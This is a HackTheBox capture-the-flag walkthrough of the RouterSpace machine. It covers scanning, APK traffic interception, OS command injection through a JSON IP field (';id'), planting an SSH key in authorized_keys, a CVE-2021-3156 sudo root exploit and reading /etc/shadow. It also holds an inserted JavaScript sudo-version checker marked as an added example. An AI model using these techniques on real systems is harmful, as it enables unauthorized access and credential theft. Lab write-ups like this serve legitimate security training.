RouterSpace HackTheBox WalkThrough


This is the RouterSpace HackTheBox machine walkthrough. In this writeup I demonstrate, step by step, how I rooted the RouterSpace HackTheBox machine. Before starting, a few facts about the box: it is a Linux machine with IP address 10.10.11.148, and its maker has rated its difficulty as Easy.

First of all, connect your PC to the HackTheBox VPN and confirm connectivity to the RouterSpace box by pinging its IP 10.10.11.148. If that works, start hacking. As usual, I began by scanning the machine. Scanning gives us an idea of how to proceed: it helps with banner grabbing the services running on the open ports, and sometimes it helps with vulnerability assessment too. As usual I used $ nmap [a popular port scanner] for this task, and the result is given below:

Scanning

$ nmap -p- --min-rate=10000 -oN fulltcp-scan.nmap 10.10.11.148
[Screenshot: nmap full TCP port scan of RouterSpace]
$ sudo nmap -p22,80 -sV -sC -oN ScriptScan.nmap 10.10.11.148
[Screenshot: nmap version and default-script scan of ports 22 and 80]

———-SNIP———

Nmap found ports 22 and 80 open. OpenSSH 8.2p1 is running on port 22 and a Node.js server is running on port 80 [which I only learned after getting inside the RouterSpace box]. Before starting enumeration of this machine, let us add the host routerspace.htb to our hosts file. The advantage is that if name-based virtual hosting is enabled, we may get a different website to enumerate. The hosts file lives in the /etc/ directory of our Kali/Parrot machine.

Host File After Modification

$ cat /etc/hosts
[Screenshot: /etc/hosts after adding the routerspace.htb entry]

Since the web server is running on port 80, we have two URLs to check: http://10.10.11.148 and http://routerspace.htb. Visiting each URL separately gave the same web page, which confirms that no virtual hosting is enabled on this server. We are free to use either URL while hunting; I will use http://routerspace.htb throughout the walkthrough.

Visiting http://routerspace.htb, I found a download button for an APK file named RouterSpace.apk. I downloaded it; we will reverse engineer it if we find nothing interesting on http://routerspace.htb itself.

[Screenshot: RouterSpace HTB web page]

I performed a directory brute force with $ dirsearch using the wordlist directory-list-2-3-medium.txt and a vhost brute force with $ gobuster using the wordlist subdomains-top1million-110000.txt, but found no special directory or virtual host. I also checked the page source at http://routerspace.htb for some kind of hint, but nothing interesting turned up. So far nothing helped me proceed further.

As we have already downloaded the APK file, let us install it in an Android emulator and play with it. I am going to use $ anbox, an open-source Android emulator for Linux. I followed this link to install Anbox on my Kali OS.

Install & Configure AnBox

$ sudo apt install anbox
[Screenshot: installing the Anbox emulator]
$ sudo modprobe ashmem_linux
$ sudo modprobe binder_linux
$ sudo /sbin/modprobe ashmem_linux
$ sudo /sbin/modprobe binder_linux
$ wget https://build.anbox.io/android-images/2018/07/19/android_amd64.img
$ sudo mv android_amd64.img /var/lib/anbox/android.img
$ sudo service anbox-container-manager restart
[Screenshot: configuring the Anbox emulator on my Kali machine]
$ anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity
[Screenshot: starting Anbox via the app manager activity from the terminal]

We have successfully installed the Anbox emulator. Next let us install the $ adb tool, which we will use to access the emulator and install RouterSpace.apk into it, and also configure the proxy setting so we can capture the requests of the RouterSpace application.

Installing adb & Configuring Proxy

$ sudo apt install adb
[Screenshot: installing adb on my Kali machine]

————-SNIP————-

$ adb devices # To list the attached devices
$ adb -s emulator-5558 install ~/Downloads/RouterSpace.apk # To install RouterSpace apk
$ adb -s emulator-5558 shell settings put global http_proxy 192.168.250.1:8081 # To configure burp proxy
[Screenshot: installing RouterSpace.apk into the Anbox emulator with adb]

We have set the proxy to 192.168.250.1:8081, where 192.168.250.1 is the gateway address of the anbox0 interface and 8081 is the port on which Burp Suite will be listening. Also configure the Burp Suite proxy to listen on port 8081, as shown in the screenshot below.

[Screenshot: Burp Suite proxy listener on 192.168.250.1:8081]

If you have trouble finding the gateway address of your Anbox interface in Burp Suite, you can configure the Burp Suite proxy to listen on all interfaces, as shown in the screenshot below. That also works.

[Screenshot: Burp Suite proxy listener bound to all interfaces]

Once everything is configured, launch the Anbox app manager with the command below, or simply search for Anbox in the start menu.

$ anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity
[Screenshot: starting Anbox via the app manager activity]
[Screenshot: starting Anbox from the start menu]

Turn on intercept in Burp Suite, open the RouterSpace application and click the Check Status button.

[Screenshot: the RouterSpace application's request captured through the Burp proxy]

Note: If you get a connection error and Anbox takes too long to start, you can restart the Anbox manager service with the command $ sudo service anbox-container-manager restart. This can resolve the startup problem.

The intercepted request carried an IP address in JSON format. This reminded me of the command injection vulnerability I had previously exploited in the DVWA web application. I have also written a post on DVWA command injection; read it here for more on the command injection vulnerability.

After trying some basic command injection payloads, I found that it is vulnerable to OS command injection.

Confirming OS Command Injection

Simply append the string ;id after the IP address 0.0.0.0 and you will get the id of the user paul.

[Screenshot: confirming the OS command injection, with the output of id for user paul]

Getting User Shell

Now that we have confirmed the OS command injection vulnerability, my next step is to get a reverse shell back to my Kali machine using a one-liner. I tried different one-liners but none of them worked [you can generate multiple one-liners from here]. This may be because nc, curl, wget and bash were not allowed to communicate with remote addresses. I didn't know exactly what the issue was.

Then I added my SSH public key to the authorized_keys file of user paul, and using my private key I got a user shell.

Note: If the authorized_keys file doesn't exist, create one.

$ ssh-keygen -f key
$ cat key.pub
[Screenshot: generating the SSH key on my Kali machine]
$ echo 'ssh-rsa <public key removed> deepak@kali' >> /home/paul/.ssh/authorized_keys
[Screenshot: appending the key.pub content to paul's authorized_keys on the RouterSpace machine]
$ chmod 600 key
$ ssh -i key [email protected]
$ whoami && id
[Screenshot: SSH into RouterSpace using the private key]

We have successfully got a user shell as paul. Let us capture the user flag from user.txt.

Capture User Flag

$ cat user.txt
[Screenshot: capturing the user flag on RouterSpace HTB]

Privilege Escalation

To escalate privileges to root, we first have to find a privilege escalation vector. We can find one either manually or using post-exploitation enumeration scripts like linpeas.sh, LinEnum.sh and many more. This time I will go with LinPEAS, i.e. the script enumeration technique.

Finding PrivEsc Vector

LinPEAS reported that the installed sudo version is vulnerable. After googling for a Sudo 1.8.31 exploit, I found that sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow [CVE-2021-3156], which allows privilege escalation to root via $ sudoedit -s and a command-line argument that ends with a single backslash character.

[Screenshot: LinPEAS output on RouterSpace HTB flagging the sudo version]

For more details about this vulnerability check this article from Qualys; a working exploit can be found here. When I tried to escalate privileges using the exploit at the latter link, I easily got a root shell. So our PrivEsc vector is privilege escalation by exploiting the vulnerable sudo version.
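A defender-side check that parses the banner from `sudo --version` and reports whether it falls in the CVE-2021-3156 range, as an added example (not from the page or the sudo project). The affected ranges, 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1, are from the Qualys advisory linked above; the function names are mine.

```javascript
// Added example, not from the page or the sudo project: flags sudo version strings
// that fall in the CVE-2021-3156 range, for use in a host audit script.
// Affected per the Qualys advisory: 1.8.2 .. 1.8.31p2 (legacy) and 1.9.0 .. 1.9.5p1
// (stable); 1.9.5p2 is the first fixed upstream release, as the page states.

// Parse "1.8.31" or "1.9.5p2" into a comparable tuple [major, minor, patch, p].
function parseSudoVersion(text) {
  const m = /(\d+)\.(\d+)\.(\d+)(?:p(\d+))?/.exec(text);
  if (!m) return null;
  return [Number(m[1]), Number(m[2]), Number(m[3]), m[4] ? Number(m[4]) : 0];
}

// Lexicographic comparison of two parsed tuples: -1, 0 or 1.
function compareVersions(a, b) {
  for (let i = 0; i < 4; i++) {
    if (a[i] !== b[i]) return a[i] < b[i] ? -1 : 1;
  }
  return 0;
}

function inRange(v, lo, hi) {
  return compareVersions(v, lo) >= 0 && compareVersions(v, hi) <= 0;
}

// Accepts the first line of `sudo --version`, e.g. "Sudo version 1.8.31".
// Returns null when the banner cannot be parsed so the caller reports it separately
// instead of silently treating the host as safe.
function isVulnerableToCVE20213156(versionBanner) {
  const v = parseSudoVersion(versionBanner);
  if (!v) return null;
  // Caveat: distributions backport the fix without bumping the upstream version
  // string, so a hit is a triage signal to confirm against the package changelog.
  return inRange(v, [1, 8, 2, 0], [1, 8, 31, 2]) || inRange(v, [1, 9, 0, 0], [1, 9, 5, 1]);
}
```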

Simply create three files named hax.c, lib.c and Makefile, put the content from this exploit into the respective files, and finally run the $ make command as shown below.

$ nano hax.c
$ nano lib.c
$ nano Makefile
$ ls
$ make
$ ./sudo-hax-me-a-sandwich 1
# whoami && id
[Screenshot: privilege escalation to root on RouterSpace HTB]

We have successfully got a root shell. Let us capture the root flag.

Capture Root Flag

# cat /root/root.txt
[Screenshot: capturing the root flag on RouterSpace HTB]

This is how I rooted the RouterSpace HackTheBox machine. I learnt a lot during this walkthrough and hope you have also learnt something new. Thanks for reading this writeup. Share your experience in the comment section. If you want to give any suggestion about the writeup, feel free to write to us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.

Dumping Root Hash

# cat /etc/shadow | grep root
[Screenshot: dumping the root hash on the RouterSpace HackTheBox machine]


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec consultant by day and a bug bounty hunter and CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/